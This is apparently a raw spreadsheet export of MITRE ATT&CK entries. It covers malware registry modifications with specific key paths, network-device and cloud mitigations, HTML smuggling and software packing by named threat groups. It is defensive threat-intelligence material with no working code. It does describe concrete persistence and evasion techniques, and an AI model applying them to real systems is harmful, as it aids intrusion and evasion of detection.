[HOPLIGHT](https://attack.mitre.org/software/S0376) has modified Managed Object Format (MOF) files within the Registry to run specific commands and create persistence on the system.(Citation: US-CERT HOPLIGHT Apr 2019)	
HermeticWiper
[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to modify Registry keys to disable crash dumps, colors for compressed files, and pop-up information about folders and desktop items.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Qualys Hermetic Wiper March 2022)
Hydraq
[Hydraq](https://attack.mitre.org/software/S0203) creates a Registry subkey to register its created service, and can also uninstall itself later by deleting this value. [Hydraq](https://attack.mitre.org/software/S0203)'s backdoor also enables remote attackers to modify and delete subkeys.(Citation: Symantec Trojan.Hydraq Jan 2010)(Citation: Symantec Hydraq Jan 2010)
HyperStack
[HyperStack](https://attack.mitre.org/software/S0537) can add the name of its communication pipe to &lt;code&gt;HKLM\SYSTEM\\CurrentControlSet\\Services\\lanmanserver\\parameters\NullSessionPipes&lt;/code&gt;.(Citation: Accenture HyperStack October 2020)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) has a command to create, set, copy, or delete a specified Registry key or value.(Citation: ESET InvisiMole June 2018)(Citation: ESET InvisiMole June 2020)
KEYMARBLE
[KEYMARBLE](https://attack.mitre.org/software/S0271) has a command to create Registry entries for storing data under &lt;code&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\WABE\DataPath&lt;/code&gt;.(Citation: US-CERT KEYMARBLE Aug 2018)
KOCTOPUS
[KOCTOPUS](https://attack.mitre.org/software/S0669) has added and deleted keys from the Registry.(Citation: MalwareBytes LazyScripter Feb 2021)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has modified registry keys of ComSysApp, Svchost, and xmlProv on the machine to gain persistence.(Citation: Medium KONNI Jan 2020)(Citation: Malwarebytes Konni Aug 2021) 
LoJax
[LoJax](https://attack.mitre.org/software/S0397) has modified the Registry key &lt;code&gt;‘HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute’&lt;/code&gt; from &lt;code&gt;‘autocheck autochk *’&lt;/code&gt; to &lt;code&gt;‘autocheck autoche *’&lt;/code&gt;.(Citation: ESET LoJax Sept 2018)
Lokibot
[Lokibot](https://attack.mitre.org/software/S0447) has modified the Registry as part of its UAC bypass process.(Citation: Talos Lokibot Jan 2021) 
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can manipulate the system registry on a compromised host.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
MegaCortex
[MegaCortex](https://attack.mitre.org/software/S0576) has added entries to the Registry for ransom contact information.(Citation: IBM MegaCortex)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has written process names to the Registry, disabled IE browser features, deleted Registry keys, and changed the ExtendedUIHoverTime key.(Citation: Medium Metamorfo Apr 2020)(Citation: Fortinet Metamorfo Feb 2020)(Citation: FireEye Metamorfo Apr 2018)(Citation: ESET Casbaneiro Oct 2019)
Mori
[Mori](https://attack.mitre.org/software/S1047) can write data to `HKLM\Software\NFC\IPA` and `HKLM\Software\NFC\` and delete Registry values.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022)
Mosquito
[Mosquito](https://attack.mitre.org/software/S0256) can modify Registry keys under &lt;code&gt;HKCU\Software\Microsoft\[dllname]&lt;/code&gt; to store configuration values. [Mosquito](https://attack.mitre.org/software/S0256) also modifies Registry keys under &lt;code&gt;HKCR\CLSID\...\InprocServer32&lt;/code&gt; with a path to the launcher.(Citation: ESET Turla Mosquito Jan 2018)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) can modify the Registry to store its configuration information.(Citation: Red Canary NETWIRE January 2020)
Naid
[Naid](https://attack.mitre.org/software/S0205) creates Registry entries that store information about a created service and point to a malicious DLL dropped to disk.(Citation: Symantec Naid June 2012)
NanoCore
[NanoCore](https://attack.mitre.org/software/S0336) has the capability to edit the Registry.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)
Neoichor
[Neoichor](https://attack.mitre.org/software/S0691) has the ability to configure browser settings by modifying Registry entries under `HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer`.(Citation: Microsoft NICKEL December 2021)
Nerex
[Nerex](https://attack.mitre.org/software/S0210) creates a Registry subkey that registers a new service.(Citation: Symantec Nerex May 2012)
Netwalker
[Netwalker](https://attack.mitre.org/software/S0457) can add the following registry entry: &lt;code&gt;HKEY_CURRENT_USER\SOFTWARE\{8 random characters}&lt;/code&gt;.(Citation: TrendMicro Netwalker May 2020)
NightClub
[NightClub](https://attack.mitre.org/software/S1090) can modify the Registry to set the ServiceDLL for a service created by the malware for persistence.(Citation: MoustachedBouncer ESET August 2023)
Orz
[Orz](https://attack.mitre.org/software/S0229) can perform Registry operations.(Citation: Proofpoint Leviathan Oct 2017)
PHOREAL
[PHOREAL](https://attack.mitre.org/software/S0158) is capable of manipulating the Registry.(Citation: FireEye APT32 May 2017)
PLAINTEE
[PLAINTEE](https://attack.mitre.org/software/S0254) uses &lt;code&gt;reg add&lt;/code&gt; to add a Registry Run key for persistence.(Citation: Rancor Unit42 June 2018)
Pandora
[Pandora](https://attack.mitre.org/software/S0664) can write an encrypted token to the Registry to enable processing of remote commands.(Citation: Trend Micro Iron Tiger April 2021)
PcShare
[PcShare](https://attack.mitre.org/software/S1050) can delete its persistence mechanisms from the registry.(Citation: Bitdefender FunnyDream Campaign November 2020)
Pillowmint
[Pillowmint](https://attack.mitre.org/software/S0517) has modified the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\DRM&lt;/code&gt; to store a malicious payload.(Citation: Trustwave Pillowmint June 2020)
PipeMon
[PipeMon](https://attack.mitre.org/software/S0501) has modified the Registry to store its encrypted payload.(Citation: ESET PipeMon May 2020)
PlugX
[PlugX](https://attack.mitre.org/software/S0013) has a module to create, delete, or modify Registry keys.(Citation: CIRCL PlugX March 2013)
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) has made registry modifications to alter its behavior upon execution.(Citation: Talos PoetRAT April 2020)
PoisonIvy
[PoisonIvy](https://attack.mitre.org/software/S0012) creates a Registry subkey that registers a new system device.(Citation: Symantec Darkmoon Aug 2005)
PolyglotDuke
[PolyglotDuke](https://attack.mitre.org/software/S0518) can write encrypted JSON configuration files to the Registry.(Citation: ESET Dukes October 2019)
PowerShower
[PowerShower](https://attack.mitre.org/software/S0441) has added a registry key so future powershell.exe instances are spawned off-screen by default, and has removed all registry entries that are left behind during the dropper process.(Citation: Unit 42 Inception November 2018)
Prestige
[Prestige](https://attack.mitre.org/software/S1058) has the ability to register new registry keys for a new extension handler via `HKCR\.enc` and `HKCR\enc\shell\open\command`.(Citation: Microsoft Prestige ransomware October 2022)
Pysa
[Pysa](https://attack.mitre.org/software/S0583) has modified the registry key “SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System” and added the ransom note.(Citation: CERT-FR PYSA April 2020) 
QUADAGENT
[QUADAGENT](https://attack.mitre.org/software/S0269) modifies an HKCU Registry key to store a session identifier unique to the compromised system as well as a pre-shared key used for encrypting and decrypting C2 communications.(Citation: Unit 42 QUADAGENT July 2018)
QakBot
[QakBot](https://attack.mitre</t>
  </si>
  <si>
    <t xml:space="preserve">File Modification
Most embedded network devices provide a command to print the version of the currently running operating system. Use this command to query the operating system for its version number and compare it to what is expected for the device in question. Because this method may be used in conjunction with  [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file.
Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised. (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)
Many vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system.  (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification)
Boot Integrity
Some vendors of embedded network devices provide cryptographic signing to ensure the integrity of operating system images at boot time.  Implement where available, following vendor guidelines. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot)
Code Signing
Many vendors provide digitally signed operating system images to validate the integrity of the software used on their platform.  Make use of this feature where possible in order to prevent and/or detect attempts by adversaries to compromise the system image. (Citation: Cisco IOS Software Integrity Assurance - Deploy Signed IOS)
Credential Access Protection
Some embedded network devices are capable of storing passwords for local accounts in either plain-text or encrypted formats.  Ensure that, where available, local passwords are always encrypted, per vendor recommendations. (Citation: Cisco IOS Software Integrity Assurance - Credentials Management)
Multi-factor Authentication
Use multi-factor authentication for user and privileged accounts. Most embedded network devices support TACACS+ and/or RADIUS.  Follow vendor prescribed best practices for hardening access control.(Citation: Cisco IOS Software Integrity Assurance - TACACS)
Password Policies
Refer to NIST guidelines when creating password policies. (Citation: NIST 800-63-3)
Privileged Account Management
Restrict administrator accounts to as few individuals as possible, following least privilege principles.  Prevent credential overlap across systems of administrator and privileged accounts, particularly between network and non-network platforms, such as servers or endpoints.
</t>
  </si>
  <si>
    <t xml:space="preserve">File Modification
Monitor for changes made to the operating system of a network device because image downgrade may be used in conjunction with  [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file.
Boot Integrity
Some vendors of embedded network devices provide cryptographic signing to ensure the integrity of operating system images at boot time.  Implement where available, following vendor guidelines. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot)
Code Signing
Many vendors provide digitally signed operating system images to validate the integrity of the software used on their platform.  Make use of this feature where possible in order to prevent and/or detect attempts by adversaries to compromise the system image. (Citation: Cisco IOS Software Integrity Assurance - Deploy Signed IOS)
Credential Access Protection
Some embedded network devices are capable of storing passwords for local accounts in either plain-text or encrypted formats.  Ensure that, where available, local passwords are always encrypted, per vendor recommendations. (Citation: Cisco IOS Software Integrity Assurance - Credentials Management)
Multi-factor Authentication
Use multi-factor authentication for user and privileged accounts. Most embedded network devices support TACACS+ and/or RADIUS.  Follow vendor prescribed best practices for hardening access control.(Citation: Cisco IOS Software Integrity Assurance - TACACS)
Password Policies
Refer to NIST guidelines when creating password policies.  (Citation: NIST 800-63-3)
Privileged Account Management
Restrict administrator accounts to as few individuals as possible, following least privilege principles.  Prevent credential overlap across systems of administrator and privileged accounts, particularly between network and non-network platforms, such as servers or endpoints.
</t>
  </si>
  <si>
    <t xml:space="preserve">Cloud Service Modification
Monitor for quota increases across all regions, especially multiple quota increases in a short period of time or quota increases in unused regions. Monitor for changes to tenant-level settings such as subscriptions and enabled regions.(Citation: Microsoft Cryptojacking 2023)
Audit
Routinely monitor user permissions to ensure only the expected users have the capability to request quota adjustments or modify tenant-level compute settings.
User Account Management
Limit permissions to request quotas adjustments or modify tenant-level compute setting to only those required.
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Exploitation for defense evasion may happen shortly after the system has been compromised to prevent detection during later actions for for additional tools that may be brought in and used. Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. 
Process Creation
Monitor for abnormal process creations, such as a Command and Scripting Interpreter spawning from a potentially exploited application. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes.
Application Isolation and Sandboxing
Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. Risks of additional exploits and weaknesses in these systems may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)
Exploit Protection
Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for software targeted for defense evasion.
Threat Intelligence Program
Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization.
Update Software
Update software regularly by employing patch management for internal enterprise endpoints and servers.
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used CVE-2015-4902 to bypass security features.(Citation: Bitdefender APT28 Dec 2015)(Citation: Microsoft SIR Vol 19)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor for newly constructed files via JavaScript, developing rules for the different variants, with a combination of different encoding and/or encryption schemes, may be very challenging. Consider monitoring files downloaded from the Internet, possibly by HTML Smuggling, for suspicious activities. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.
Application Isolation and Sandboxing
Browser sandboxes can be used to mitigate some of the impact of exploitation, but sandbox escapes may still exist. 
APT29
[APT29](https://attack.mitre.org/groups/G0016) has embedded an ISO file within an HTML attachment that contained JavaScript code to initiate malware execution.(Citation: ESET T3 Threat Report 2021) 
EnvyScout
[EnvyScout](https://attack.mitre.org/software/S0634) contains JavaScript code that can extract an encoded blob from its HTML body and write it to disk.(Citation: MSTIC Nobelium Toolset May 2021)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) has been delivered in ZIP files via HTML smuggling.(Citation: Trend Micro Black Basta October 2022)(Citation: Deep Instinct Black Basta August 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Modification
Compare the checksum of the operating system file with the checksum of a known good copy from a trusted source. Some embedded network device platforms may have the capability to calculate the checksum of the file, while others may not. Even for those platforms that have the capability, it is recommended to download a copy of the file to a trusted computer to calculate the checksum with software that is not compromised.https://tools.cisco.com/security/center/resources/integrity_assurance.html#7_x005F_x000D_
_x005F_x000D_
Many vendors of embedded network devices can provide advanced debugging support that will allow them to work with device owners to validate the integrity of the operating system running in memory. If a compromise of the operating system is suspected, contact the vendor technical support and seek such services for a more thorough inspection of the current running system. https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
Boot Integrity
Some vendors of embedded network devices provide cryptographic signing to ensure the integrity of operating system images at boot time.  Implement where available, following vendor guidelines. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot)
Code Signing
Many vendors provide digitally signed operating system images to validate the integrity of the software used on their platform.  Make use of this feature where possible in order to prevent and/or detect attempts by adversaries to compromise the system image. (Citation: Cisco IOS Software Integrity Assurance - Deploy Signed IOS)
Credential Access Protection
Some embedded network devices are capable of storing passwords for local accounts in either plain-text or encrypted formats.  Ensure that, where available, local passwords are always encrypted, per vendor recommendations. (Citation: Cisco IOS Software Integrity Assurance - Credentials Management)
Multi-factor Authentication
Use multi-factor authentication for user and privileged accounts. Most embedded network devices support TACACS+ and/or RADIUS.  Follow vendor prescribed best practices for hardening access control.(Citation: Cisco IOS Software Integrity Assurance - TACACS)
Password Policies
Refer to NIST guidelines when creating password policies.  (Citation: NIST 800-63-3)
Privileged Account Management
Restrict administrator accounts to as few individuals as possible, following least privilege principles.  Prevent credential overlap across systems of administrator and privileged accounts, particularly between network and non-network platforms, such as servers or endpoints.
SYNful Knock
[SYNful Knock](https://attack.mitre.org/software/S0519) is malware that is inserted into a network device by patching the operating system image.(Citation: Mandiant - Synful Knock)(Citation: Cisco Synful Knock Evolution)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor for downloaded malicious files, though developing rules for the different variants, with a combination of different encoding and/or encryption schemes, may be very challenging. Consider monitoring files downloaded from the Internet, possibly by LNK Icon Smuggling, for suspicious activities. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.
File Metadata
Monitor contextual data about a file that may highlight embedded malicious content, which may include information such as name, the content (ex: signature, headers, or data/media), file size, etc.; correlate with other suspicious behavior to reduce false positives.
Antivirus/Antimalware
Use signatures or heuristics to detect malicious LNK and subsequently downloaded files.
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent execution of potentially obfuscated scripts or payloads.
</t>
  </si>
  <si>
    <t xml:space="preserve">File Metadata
Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.
Antivirus/Antimalware
Employ heuristic-based malware detection. Ensure updated virus definitions and create custom signatures for observed malware. 
2016 Ukraine Electric Power Attack
During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used UPX to pack a copy of [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Dragos Crashoverride 2018)
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) used VMProtect to slow the reverse engineering of malicious binaries.(Citation: Mandiant APT41)
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used software packing in its tools.(Citation: McAfee Night Dragon)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) packed malicious .db files with Themida to evade detection.(Citation: ClearSky Lazarus Aug 2020)(Citation: McAfee Lazarus Jul 2020)(Citation: McAfee Lazarus Nov 2020)
Operation Dust Storm
For [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors used UPX to pack some payloads.(Citation: Cylance Dust Storm)
Operation Spalax
For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used a variety of packers, including CyaX, to obfuscate malicious executables.(Citation: ESET Operation Spalax Jan 2021)
APT29
[APT29](https://attack.mitre.org/groups/G0016) used UPX to pack files.(Citation: Mandiant No Easy Breach)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has been known to pack their tools.(Citation: APT3 Adversary Emulation Plan)(Citation: FireEye Clandestine Wolf) 
APT38
[APT38](https://attack.mitre.org/groups/G0082) has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium, to pack their implants.(Citation: FireEye APT38 Oct 2018)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has packed tools with UPX, and has repacked a modified version of [Mimikatz](https://attack.mitre.org/software/S0002) to thwart anti-virus detection.(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)
Aoqin Dragon
[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has used the Themida packer to obfuscate malicious payloads.(Citation: SentinelOne Aoqin Dragon June 2022)
Dark Caracal
[Dark Caracal](https://attack.mitre.org/groups/G0070) has used UPX to pack [Bandook](https://attack.mitre.org/software/S0234).(Citation: Lookout Dark Caracal Jan 2018)
Elderwood
[Elderwood](https://attack.mitre.org/groups/G0066) has packed malware payloads before delivery to victims.(Citation: Symantec Elderwood Sept 2012)
Ember Bear
[Ember Bear](https://attack.mitre.org/groups/G1003) has packed malware to help avoid detection.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) packed some payloads using different types of packers, both known and custom.(Citation: Cybereason Soft Cell June 2019)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has packed malware with UPX.(Citation: Malwarebytes Kimsuky June 2021)
MoustachedBouncer
[MoustachedBouncer](https://attack.mitre.org/groups/G1019) has used malware plugins packed with Themida.(Citation: MoustachedBouncer ESET August 2023)
Patchwork
A [Patchwork](https://attack.mitre.org/groups/G0040) payload was packed with UPX.(Citation: Securelist Dropping Elephant)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106)'s miner has created UPX-packed files in the Windows Start Menu Folder.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)(Citation: Anomali Rocke March 2019)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has used a .NET packer to obfuscate malicious files.(Citation: Cisco Operation Layover September 2021)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has used UPX to obscure malicious code.(Citation: IBM TA505 April 2020)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has used UPX and Ezuri packer to pack its binaries.(Citation: Trend Micro TeamTNT)
The White Company
[The White Company](https://attack.mitre.org/groups/G0089) has obfuscated their payloads through packing.(Citation: Cylance Shaheen Nov 2018)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has packed malware and tools, including using VMProtect.(Citation: Trend Micro DRBControl February 2020)(Citation: Trend Micro Iron Tiger April 2021)
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used multi-stage packers for exploit code.(Citation: Check Point APT31 February 2021)
Anchor
[Anchor](https://attack.mitre.org/software/S0504) has come with a packed payload.(Citation: Cyberreason Anchor December 2019)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) has used UPX packers for its payload DLL.(Citation: Malwarebytes Kimsuky June 2021)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) uses a software packer called Pe123\RPolyCryptor.(Citation: Cybereason Astaroth Feb 2019)
BLINDINGCAN
[BLINDINGCAN](https://attack.mitre.org/software/S0520) has been packed with the UPX packer.(Citation: US-CERT BLINDINGCAN Aug 2020)
Babuk
Versions of [Babuk](https://attack.mitre.org/software/S0638) have been packed.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: Medium Babuk February 2021)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) has a variant with a packed payload.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) has used the MPRESS packer and similar tools for obfuscation.(Citation: Talos Bisonal Mar 2020) 
CSPY Downloader
[CSPY Downloader](https://attack.mitre.org/software/S0527) has been packed with UPX.(Citation: Cybereason Kimsuky November 2020)
China Chopper
[China Chopper](https://attack.mitre.org/software/S0020)'s client component is packed with UPX.(Citation: Lee 2013)
Clop
[Clop](https://attack.mitre.org/software/S0611) has been packed to help avoid detection.(Citation: Mcafee Clop Aug 2019)(Citation: Cybereason Clop Dec 2020)
CostaBricks
[CostaBricks](https://attack.mitre.org/software/S0614) can implement a custom-built virtual machine mechanism to obfuscate its code.(Citation: BlackBerry CostaRicto November 2020)
Cuba
[Cuba](https://attack.mitre.org/software/S0625) has a packed payload when delivered.(Citation: McAfee Cuba April 2021) 
DRATzarus
[DRATzarus](https://attack.mitre.org/software/S0694)'s dropper can be packed with UPX.(Citation: ClearSky Lazarus Aug 2020)
DarkComet
[DarkComet](https://attack.mitre.org/software/S0334) has the option to compress its payload using UPX or MPRESS.(Citation: Malwarebytes DarkComet March 2018)
Daserf
A version of [Daserf](https://attack.mitre.org/software/S0187) uses the MPRESS packer.(Citation: Trend Micro Daserf Nov 2017)
Dok
[Dok](https://attack.mitre.org/software/S0281) is packed with an UPX executable packer.(Citation: hexed osx.dok analysis 2019)
Donut
[Donut](https://attack.mitre.org/software/S0695) can generate packed code modules.(Citation: Donut Github)	
Dyre
[Dyre](https://attack.mitre.org/software/S0024) has been delivered with encrypted resources and must be unpacked for execution.(Citation: Malwarebytes Dyreza November 2015)
Egregor
[Egregor](https://attack.mitre.org/software/S0554)'s payloads are custom-packed, archived and encrypted to prevent analysis.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cyble Egregor Oct 2020)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has used custom packers to protect its payloads.(Citation: Trend Micro Emotet Jan 2019)
FYAnti
[FYAnti](https://attack.mitre.org/software/S0628) has used ConfuserEx to pack its .NET module.(Citation: Securelist APT10 March 2021)
FatDuke
[FatDuke](https://attack.mitre.org/software/S0512) has been regularly repacked by its operators to create large binaries and evade detection.(Citation: ESET Dukes October 2019)
FinFisher
A [FinFisher](https://attack.mitre.org/software/S0182) variant uses a custom packer.(Citation: FinFisher Citation)(Citation: Securelist BlackOasis Oct 2017)
GoldMax
[GoldMax](https://attack.mitre.org/software/S0588) has been packed for obfuscation.(Citation: FireEye SUNSHUTTLE Mar 2021)
GreyEnergy
[GreyEnergy](https://attack.mitre.org/software/S0342) is packed for obfuscation.(Citation: ESET GreyEnergy Oct 2018)
H1N1
[H1N1](https://attack.mitre.org/software/S0132) uses a custom packing algorithm.(Citation: Cisco H1N1 Part 1)
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) has packed ELF files into other binaries.(Citation: Unit 42 Hildegard Malware)
HotCroissant
[HotCroissant](https://attack.mitre.org/software/S0431) has used the open source UPX executable packer.(Citation: Carbon Black HotCroissant April 2020)
HyperBro
[HyperBro](https://attack.mitre.org/software/S0398) has the ability to pack its payload.(Citation: Trend Micro Iron Tiger April 2021)
IcedID
[IcedID](https://attack.mitre.org/software/S0483) has packed and encrypted its loader module.(Citation: Juniper IcedID June 2020)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has been packed for obfuscation.(Citation: Malwarebytes KONNI Evolves Jan 2022)
LiteDuke
[LiteDuke](https://attack.mitre.org/software/S0513) has been packed with multiple layers of encryption.(Citation: ESET Dukes October 2019)
Lokibot
[Lokibot](https://attack.mitre.org/software/S0447) has used several packing methods for obfuscation.(Citation: Infoblox Lokibot January 2019)
Lucifer
[Lucifer](https://attack.mitre.org/software/S0532) has used UPX packed binaries.(Citation: Unit 42 Lucifer June 2020)
Machete
[Machete](https://attack.mitre.org/software/S0409) has been packed with NSIS.(Citation: ESET Machete July 2019) 
Melcoz
[Melcoz](https://attack.mitre.org/software/S0530) has been packed with VMProtect and Themida.(Citation: Securelist Brazilian Banking Malware July 2020)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has used VMProtect to pack and protect files.(Citation: Fortinet Metamorfo Feb 2020) 
Misdat
[Misdat](https://attack.mitre.org/software/S0083) was typically packed using UPX.(Citation: Cylance Dust Storm)
Mongall
[Mongall](https://attack.mitre.org/software/S1026) has been packed with Themida.(Citation: SentinelOne Aoqin Dragon June 2022)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) has used .NET packer tools to evade detection.(Citation: Red Canary NETWIRE January 2020)
OSX_OCEANLOTUS.D
[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has a variant that is packed with UPX.(Citation: ESET OceanLotus macOS April 2019)
OopsIE
[OopsIE](https://attack.mitre.org/software/S0264) uses the SmartAssembly obfuscator to pack an embedded .Net Framework assembly used for C2.(Citation: Unit 42 OopsIE! Feb 2018)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can encrypt and pack malicious payloads.(Citation: Cyberint Qakbot May 2021)
Raindrop
[Raindrop](https://attack.mitre.org/software/S0565) used a custom packer for its [Cobalt Strike](https://attack.mitre.org/software/S0154) payload, which was compressed using the LZMA algorithm.(Citation: Symantec RAINDROP January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)
S-Type
Some [S-Type](https://attack.mitre.org/software/S0085) samples have been packed with UPX.(Citation: Cylance Dust Storm)
SDBbot
[SDBbot](https://attack.mitre.org/software/S0461) has used a packed installer file.(Citation: IBM TA505 April 2020)
Saint Bot
[Saint Bot](https://attack.mitre.org/software/S1018) has been packed using a dark market crypter.(Citation: Malwarebytes Saint Bot April 2021)
SeaDuke
[SeaDuke](https://attack.mitre.org/software/S0053) has been packed with the UPX packer.(Citation: Unit 42 SeaDuke 2015)
ShimRat
[ShimRat](https://attack.mitre.org/software/S0444)'s loader has been packed with the compressed [ShimRat](https://attack.mitre.org/software/S0444) core DLL and the legitimate DLL for it to hijack.(Citation: FOX-IT May 2016 Mofang)
Spark
[Spark](https://attack.mitre.org/software/S0543) has been packed with Enigma Protector to obfuscate its contents.(Citation: Unit42 Molerat Mar 2020) 
Squirrelwaffle
[Squirrelwaffle](https://attack.mitre.org/software/S1030) has been packed with a custom packer to hide payloads.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021)
SysUpdate
[SysUpdate](https://attack.mitre.org/software/S0663) has been packed with VMProtect.(Citation: Trend Micro Iron Tiger April 2021)(Citation: Lunghi Iron Tiger Linux)
Tomiris
[Tomiris](https://attack.mitre.org/software/S0671) has been packed with UPX.(Citation: Kaspersky Tomiris Sep 2021)
Torisma
[Torisma](https://attack.mitre.org/software/S0678) has been packed with Iz4 compression.(Citation: McAfee Lazarus Nov 2020)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) leverages a custom packer to obfuscate its functionality.(Citation: S2 Grupo TrickBot June 2017)
Trojan.Karagany
[Trojan.Karagany](https://attack.mitre.org/software/S0094) samples sometimes use common binary packers such as UPX and Aspack on top of a custom Delphi binary packer.(Citation: Symantec Dragonfly)(Citation: Secureworks Karagany July 2019)
Uroburos
[Uroburos](https://attack.mitre.org/software/S0022) uses a custom packer.(Citation: Symantec Waterbug)(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
VERMIN
[VERMIN](https://attack.mitre.org/software/S0257) is initially packed.(Citation: Unit 42 VERMIN Jan 2018)
Valak
[Valak](https://attack.mitre.org/software/S0476) has used packed DLL payloads.(Citation: SentinelOne Valak June 2020)
Zebrocy
[Zebrocy](https://attack.mitre.org/software/S0251)'s Delphi variant was packed with UPX.(Citation: Unit42 Sofacy Dec 2018)(Citation: Accenture SNAKEMACKEREL Nov 2018)
ZeroT
Some [ZeroT](https://attack.mitre.org/software/S0230) DLL files have been packed with UPX.(Citation: Proofpoint ZeroT Feb 2017)
jRAT
[jRAT](https://attack.mitre.org/software/S0283) payloads have been packed.(Citation: Kaspersky Adwind Feb 2016)
yty
[yty](https://attack.mitre.org/software/S0248) packs a plugin with UPX.(Citation: ASERT Donot March 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
